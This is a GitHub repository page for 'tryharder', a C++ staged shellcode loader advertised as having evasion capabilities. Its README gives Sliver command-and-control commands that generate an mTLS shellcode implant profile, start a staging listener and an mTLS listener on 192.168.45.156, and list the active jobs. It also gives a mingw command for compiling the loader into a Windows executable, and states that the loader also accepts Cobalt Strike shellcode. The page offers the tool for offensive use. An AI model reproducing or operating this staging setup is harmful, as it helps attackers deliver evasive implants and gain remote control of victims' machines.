Skip to content

C++ Staged Shellcode Loader with Evasion capabilities.

Notifications You must be signed in to change notification settings

joker88/tryharder

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

46 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

sliver > profiles new --mtls 192.168.45.156:443 -G --format shellcode sliver

sliver > stage-listener --url https://192.168.45.156:80 --profile sliver

sliver > mtls -L 192.168.45.156 -l 443

sliver > jobs

 ID   Name   Protocol   Port   Stage Profile                          
==== ====== ========== ====== ========================================
 4    mtls   tcp        443                                           
 5    http   tcp        80     sliver (Sliver name: DEVELOPED_BULLET) 

Linux compile command:

x86_64-w64-mingw32-g++ main.cpp -o tryharder.exe -lwininet -static-libgcc -static-libstdc++

Note:

This was intended to be used with sliver, but you can set your infra up to feed whatever shellcode into it and it should* work.

Was able to have the loader ingest Cobalt shellcode just fine.

About

C++ Staged Shellcode Loader with Evasion capabilities.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • C++ 98.7%
  • Batchfile 1.3%